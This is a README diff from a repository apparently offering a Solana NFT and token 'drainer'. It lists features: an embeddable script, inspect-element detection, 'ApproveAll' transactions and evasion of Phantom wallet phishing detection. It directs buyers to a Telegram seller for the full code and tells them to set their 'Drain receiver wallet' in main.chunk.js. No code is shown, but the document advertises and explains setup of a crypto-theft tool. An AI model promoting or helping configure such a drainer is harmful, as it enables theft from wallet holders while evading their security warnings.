OceanaPods/Solana-NFT-Drainer/README.md

 ✅Embed script

 ✅Inspect Element Detection

 ✅ApproveAll Transaction

 ✅No API needed

 ✅Custom & Cool Design

 ✅Instant transactions

 ✅No contract required

 ✅Anti Phantom Phishing Detections

 ✅NFT + Tokens Drainer

 # 📔Setup Guide
-# ❗️Note!
-It will not work if you havent bought the full code TELEGRAM @paradrainers
+# ❗️Note - It will not work if you havent bought the full code TELEGRAM @paradrainers

 You need to edit the main.chunk.js file to your Drain receiver wallet.